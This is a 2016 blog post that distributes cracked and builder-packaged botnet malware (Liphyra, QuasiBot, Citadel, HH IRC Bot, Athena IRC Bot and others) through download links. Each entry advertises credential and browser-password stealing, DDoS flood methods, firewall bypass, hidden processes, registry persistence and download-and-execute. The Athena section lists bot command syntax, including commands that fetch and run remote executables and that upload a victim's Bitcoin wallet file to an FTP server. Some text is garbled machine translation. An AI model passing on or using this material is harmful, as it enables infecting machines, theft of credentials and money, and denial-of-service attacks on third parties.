Friday, 5 February 2016

Liphyra Bot+Builder+Src

Liphyra Bot+Builder+Src

I know you would like it based on Atrax Panel

C&C

RevSocks5

PwdGrabber

GRABS FOLLOWING BROWSERS

Chrome
Filezilla
Firefox
Internet Explorer
Opera
Pidgin
Safari

DDoS:

Slowloris
HTTP-Flood
SYN-Flood
UDP-Flood


Steam plugin

Download 
https://mega.nz/#!Td0gRRTB!YZOpXe0GdE8ajAVGotUI0DN57LV6bRZm5AsTAARf3Ik

QuasiBot - Webshell Manager aka HTTP Botnet

QuasiBot - Webshell Manager aka HTTP Botnet

QuasiBot is a complex webshell manager written in PHP, which operate on web-basedbackdoors implemented by user himself. Using prepared php backdoors, quasiBot will work as C&C trying to communicate with each backdoor. Tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is quasi-HTTP botnet, therefore it is called.

All data about bots is stored in SQL database, ATM only MySQL is supported. TOR proxy is also supported, the goal was to create secure connection between C&C and backdoors; using SOCKS5, it is able to torify all connections between you and web server. All configuration is stored in config file. QuasiBot it's still under construction so i am aware of any potential bugs.

You will need any web server software; tested on Linux, Apache 2.2 and PHP 5.4.4.
Todo

Authorization system
Move Linux Exploit Suggestor to PHP language
Add Windows support to 'PWN' module
Automatic attacks on servers
Backdoors creation (backconnects)
Source code cleanup, it's still pretty shitty; amount of required files should be reduced
???

...and ofc., it's for educational purposes only 


Download https://mega.nz/#!adEVzZKT!9bXGkaLLEcH4NdoVzrr1XFx7gFCotT5QYM2-3EX1xQg

Socks 5 Builder v1.0 by Stalin

Integrado en el sistema de vida de los Medias-bot en el explorador de proceso `
no pasa por el controlador del cortafuegos
script comprueba la viabilidad del compuesto cuando es posible la instalación de conexion seleccionada con Sox - mismo escribió los calcetines básicos válidos

procesos invisibles (rendimiento del proceso explorer.exe)
sin pasar por el controlador del cortafuegos
proktivnyh pasar protecciones (pinzar temporalmente - apretar botones)
panel de administración práctica
mapear toda la información posible acerca de la máquina capturada (incluyendo el ProtektStoradzha contenido)
ejecutar la descarga y ejecutar cualquier exe c Urla
la función de auto-destrucción
función bombardero
posible determinar cómo cada equipo bot individuo y el país
Hay otras dos partes de administrador sin tener en cuenta los cables para controlar los robots
esteystveno socks5
DDoS: http inundar el servidor para enviar un GET, peticiones POST (prueba)
el tamaño de la bot ya embalado - 43 kb (en principio no es crítica cuando se carga por Loder)
fue escrito en C + + puro

Download https://mega.nz/#!LJEmmIRL!ehBsH_6kTECS0UfIY_9p9qGm4JSeQ2CbKolNiWKBBik

mbot V1

mbot V1
mbot V1
  • Descargar y Ejecutar Archivos
  • Visitas por URL
  • Funcional en Windows XP, Vista, 7
  •  
Download 
https://mega.nz/#!PBkUjDhY!rx-ZRl2fR5hHOOpvvXIROxuUsDsDwSuJfJGp3zZulbE

Citadel 1.3.5.1 Cracked

Citadel 1.3.5.1 Cracked
Code:
More Information here :




==============================

= 1. Description and facilities. =

==============================

ICE9 - software to steal personal user data from remote systems, Windows. On

plain language of "Troy", "backdoor", "virus". But the author does not like these words, therefore, further documentation

He will call this software "Bot".



Boat is fully based on the WinAPI Interception in UserMode (Ring3), this means that the bot does not use

no drivers or downloads in Ring0. This feature makes it possible to run even from Bota

Guest Account Windows. Plus, it ensures greater stability and adaptability

subsequent versions of Windows.



Bot is developed in Visual C + + version 9.0 +, with no additional libraries are used

Type msvcrt, ATL, MFC, QT, etc. Bot code is written with the following priorities (in descending order):

1. stability (carefully checked all the results of the call functions, etc.)

2. size (to avoid duplication of algorithms, repetitive calls, functions, etc.)

3. speed (not the type of instruction while (1 ){..}, for (int i = 0; i



Functions and features bot:

1. Sniffer traffic for the protocol TCP.

1.1. Interception of FTP logins on any port.

1.2. Interception of POP3 logins on any port.

1.3. The interception of any data from the traffic (a personal request).



2. Intercepting HTTP / HTTPS requests to wininet.dll, ie all programs working with this

library. This includes Internet Explorer (any version), Maxton, etc.

2.1. Substitution ..



3. The functions of the server.

3.1 Socks4/4a/5.

3.2 Bekkonekt for any services (RDP, Socks, FTP, etc.) on the infected machine. You can

access to a computer that is behind a NAT, or, for example, that

banned from the internet connection.

3.3 Getting a screenshot of your screen in real time.



MySQL-server

----------------------

MySQL is required to store all data on botnete. The recommended version is not lower than 5.1.30, as well

worth considering that when the control panel in the older versions have some

problem. All table control panel, go to a MyISAM, it is important to optimize

speed of work with this format, on the basis of the available server resources.



We recommend the following changes to the MySQL-server setup (my or my.ini):



max_connections = 2000 # Or higher



Download MySQL: http://dev.mysql.com/downloads/



To nix-systems exhibit the right:

. - 777

/ system - 777

/ tmp - 777


Download https://mega.nz/#!eFEWFbAT!8aPzK5k8NQIQjkOhXN4gn2Yj2Eh_6sxjD5XVzru3eOI

HH IRC Bot

Supported Operating Systems: (Tested on)

Windows XP x86/x64
Windows Vista x86/x64
Windows 7 x86/x64
Windows 8 x86/x64
Core Bot Features:

HKCU Startup
HKLM Startup
Disable UAC
Melt
Registry Persistence
Bot Features:

UDP Flood
HTTP GET Flood
HTTP POST Flood
ConDis Flood
HTTP Torhammer Flood
HTTP Hulk Flood
Download-Execute
Update
Bot Control Features:

Accepts commands only from specified Master in Builder.
ToDo:
SSL Support
Channel Password Support
Bug fixes? If any.

Download https://mega.nz/#!eIdWUbbL!_iaEq2JOA7tYY8xpdPfX9-D8V-xp4YkJkH-TYEXKOwo

Athena IRC Bot v2.4.0 [Cracked]

Athena IRC Bot v2.4.0 [Cracked]

Athena is a stable DDoS bot coded in C++ (zero dependencies) perfect for infecting and herding Windows machines. This bot features some of the best, most advanced DDoS tactics available on the market that will take down webservers, gaming servers, teamspeak/VoiP servers, home connections, etc with ease. It is resistant to botkilling, and will kill most other bots available.
The bot comes equipped with:
– Botkiller capable of wiping out bots such as Andromeda, Zeus, SpyEye, Insomnia, SmokeLoader, ngrBot, etc…
– 11 methods of DDoS, the same tactics used in AthenaIRC(some of the strongest DDoS tactics available on the market)
– A built-in website checker that utilizes bots, not unlike hyperspin.com or just-ping.com
– SmartView/normal view/view hidden(from random existing brower)
– In-depth statistics about each bot
– Download/Update/Uninstall
– Shell commands(because you never know)
Please note: The bin is not FUD.

Commands/Features: (You can set any of these in your topic – bots will parse the command on join)
DDoS Commands
[Port 80 is most common for websites]
!udp – Sends mass amounts of random packets to target host/ip, perfect for home connections(SYNTAX: !udp host/ip port time)[Use ‘0’ to flood random ports]
!condis – Rapid connect/disconnect flood, it takes down gaming(ie. CSS) and teamspeak/VoiP servers like gravy(SYNTAX: !condis host/ip port time)
!httpget – Rapidly sends hundreds of HTTP GET requests every second from each bot
!httppost – Makes hundreds of HTTP POST requests from each bot, and holds connection by slowly posting content
!slowloris – Connects to a webserver through several hundred sockets per bot, and sits on it.
!arme – Exploits a vulnerability in Apache that crashes servers though many bulk partial headers requests at once causing a lot of memory to swap to the remote filesystem. It will break vulnerable servers’ physical hardware if vulnerable enough.
!rudy – Slowly posts data to existing forms on a given website in many concurrent submissions.
(SYNTAX: !ddos-type http://website.com/directory/index.php port time)[a specific directory/file is optional]
IRC War Flooding Commands
!irc – Connects to IRC, and floods a target(#channel OR user) utilizing many different communication techniques in IRC. (SYNTAX: !irc irc.server.net 6667 180 nickname/#channel)
!anope – Layer 7 IRC DDoS. It doesn’t matter if the IRC network’s hidden hub is protecting services, they can still be ddos’ed at application layer. This attack will crash anope services. (SYNTAX: !anope irc.server.net 6667 180)
Misc. Bot Commands
!id – Displays the version of the bot and who it is licensed to
!ping – Returns bot’s ping time to its current connection
!openurl – Opens a webpage in the default browser(SYNTAX: !openurl http://website.com)
!openurlhidden – Opens a webpage hidden in Internet Explorer(SYNTAX: !openurlhidden http://website.com)
!blockurl – Creates a line in the computer hosts file that disallows access to a specified host(SYNTAX: !blockurl website.com)
!dlexec – Downloads and executes a file from a URL(SYNTAX: !dlexec http://website.com/program.exe)
!update – Downloads and executes a given link. The bot will uninstall after successful execution(SYNTAX: !updatehttp://website.com/file.exe)
!remove – Uninstalls the bot and deletes any traces of itself
Stealers
!btcwallet – Scans bot computer for wallet.dat(BTC wallet) and uploads it to an FTP of your choice(SYNTAX: !btcwallet ftphost.com user123 pass123)
IRC Commands
!raw – Sends raw commands to the server(SYNTAX: !raw PRIVMSG #channel :message)
!silent on/off – Toggles bot output(overridden by the !raw command)
!join – Joins bot to a channel(SYNTAX: !join #channel [chankey])
!part – Parts bot from a channel(SYNTAX: !part #channel)
!newnick – Changes bot nickname using a new random number and name
!randnick on/off – Toggle for random bot names(Samantha58385) and info-based bot names([A|WIN7|4]abcde)
!reconnect – Attempts to reconnect to the current IRC server/network and channel after disconnecting for 20 seconds


Download https://mega.nz/#!uMMihBiR!bMZoL2kd9mQ3WUWNCq5dnANxAhMO-xSa8NzSET7HrDk